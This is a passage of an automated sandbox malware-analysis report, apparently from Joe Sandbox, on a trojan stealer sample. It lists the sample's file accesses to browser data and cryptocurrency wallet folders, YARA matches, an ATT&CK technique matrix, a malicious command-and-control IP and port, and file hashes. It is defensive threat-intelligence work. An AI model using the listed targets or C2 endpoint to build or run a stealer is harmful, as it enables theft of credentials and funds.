                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: K3xL5Xy0XS.exeBinary or memory string: WIN_81
                  Source: K3xL5Xy0XS.exeBinary or memory string: WIN_XP
                  Source: K3xL5Xy0XS.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: K3xL5Xy0XS.exeBinary or memory string: WIN_XPe
                  Source: K3xL5Xy0XS.exeBinary or memory string: WIN_VISTA
                  Source: K3xL5Xy0XS.exeBinary or memory string: WIN_7
                  Source: K3xL5Xy0XS.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00241204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00241204
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00241806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00241806
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  221
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin Shares21
                  Input Capture
                  11
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS227
                  System Information Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets451
                  Security Software Discovery
                  SSHKeylogging12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts
                  Cached Domain Credentials321
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items321
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  K3xL5Xy0XS.exe63%ReversingLabsWin32.Trojan.AutoitInject
                  K3xL5Xy0XS.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://185.222.58.90:55615/0%Avira URL Cloudsafe
                  http://185.222.58.90:556150%Avira URL Cloudsafe
                  https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                  185.222.58.90:556150%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.ip.sb
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    185.222.58.90:55615true
                    • Avira URL Cloud: safe
                    unknown
                    http://185.222.58.90:55615/true
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/ip%appdata%K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                        high
                        https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                          high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                            high
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.datacontract.org/2004/07/RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                                            high
                                            http://tempuri.org/RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                                                  high
                                                  https://www.ecosia.org/newtab/RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                                                    high
                                                    http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Endpoint/SetEnvironmentRegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/Endpoint/GetUpdatesRegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                                                              high
                                                              https://api.ipify.orgcookies//settinString.RemovegK3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                                                                    high
                                                                    http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Endpoint/VerifyUpdateRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/0RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://185.222.58.90:55615RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                185.222.58.90
                                                                                unknownNetherlands
                                                                                51447ROOTLAYERNETNLtrue
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1580311
                                                                                Start date and time:2024-12-24 09:06:13 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 12s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:6
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:K3xL5Xy0XS.exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:6AFDD0CBDF70F3E75F423B1557648E85.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@4/49@1/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 99%
                                                                                • Number of executed functions: 47
                                                                                • Number of non-executed functions: 296
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Stop behavior analysis, all processes terminated
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.12.31, 104.26.13.31, 172.202.163.200, 13.107.246.63
                                                                                • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • VT rate limit hit for: K3xL5Xy0XS.exe
                                                                                TimeTypeDescription
                                                                                03:07:16API Interceptor63x Sleep call for process: RegSvcs.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                185.222.58.90DBAcglWJwi.exeGet hashmaliciousRedLineBrowse
                                                                                • 185.222.58.90:17910/
                                                                                QUOTATION062022.exeGet hashmaliciousFicker Stealer, RedLineBrowse
                                                                                • 185.222.58.90:17910/
                                                                                QUOTATION 061622.exeGet hashmaliciousFicker Stealer, RedLineBrowse
                                                                                • 185.222.58.90:17910/
                                                                                SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exeGet hashmaliciousRedLineBrowse
                                                                                • 185.222.58.90:17910/
                                                                                RFQ - FYKS - 06052022.exeGet hashmaliciousRedLineBrowse
                                                                                • 185.222.58.90:17910/
                                                                                MACHINE SPECIFICATIONS.exeGet hashmaliciousRedLineBrowse
                                                                                • 185.222.58.90:17910/
                                                                                MACHINE SPECIFICATIONS.exeGet hashmaliciousRedLineBrowse
                                                                                • 185.222.58.90:17910/
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                ROOTLAYERNETNLInvoice-BL. Payment TT $ 16945.99.exeGet hashmaliciousRedLineBrowse
                                                                                • 45.137.22.164
                                                                                MfzXU6tKOq.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                • 185.222.58.82
                                                                                lWnSA7IyVc.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                • 185.222.58.229
                                                                                8ZVd2S51fr.exeGet hashmaliciousRedLineBrowse
                                                                                • 185.222.58.241
                                                                                Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 185.222.57.90
                                                                                Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 185.222.57.90
                                                                                9dOKGgFNL2.exeGet hashmaliciousRedLineBrowse
                                                                                • 45.137.22.126
                                                                                RFQ List and airflight 2024.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 45.137.22.174
                                                                                Calyciform.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 45.137.22.248
                                                                                I5pvP0CU6M.exeGet hashmaliciousRedLineBrowse
                                                                                • 45.137.22.248
                                                                                No context
                                                                                No context
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2666
                                                                                Entropy (8bit):5.345804351520589
                                                                                Encrypted:false
                                                                                SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHjHKx1qHpHsLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5DqO
                                                                                MD5:99EF806358EC635615FCC973DA805A5D
                                                                                SHA1:3D5E802B056A5CABB53707A30D60F9E8294CEC13
                                                                                SHA-256:99957E097E6DB3573742EFD7B473D80998DE5AEF0E473D2C505EBBB1252E8285
                                                                                SHA-512:7B340970383EB8685E2D3ADFE94E1B253DF7444ACA6EEA5859ED2DFFBCBCAFECE645961FF0C76E365EBA8ABF7A6444414E8D97363CC09BD34362E234DC51F21E
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                                Process:C:\Users\user\Desktop\K3xL5Xy0XS.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):74822
                                                                                Entropy (8bit):7.914269366918041
                                                                                Encrypted:false
                                                                                SSDEEP:1536:yf94gSIuZwL4WWNSn9po6VF26ddVIiV7fu7/6/Pjm/6npLMGExujS+iAmy:iB3uZwMjQ0HcLTuT6/PvuDH+iFy
                                                                                MD5:EFBA133AFE0685A74CBE14C631245B7C
                                                                                SHA1:2543F0173D222CB51546729B28AE606FD5557CDF
                                                                                SHA-256:3ABB56BEB0BE69F7A82A809EDB7DDC78DA5AD5858711FC5ACBE7D0480EE7D96E
                                                                                SHA-512:AF45F07EBB0BAD4CC4B84292D48AA5D20DD0F86D74B2F4684067183D6AE66424F747D3D6309F36F3C110F16618AA5E092E7DE2F10430314DCDC022249E88535F
                                                                                Malicious:false
                                                                                Reputation:low
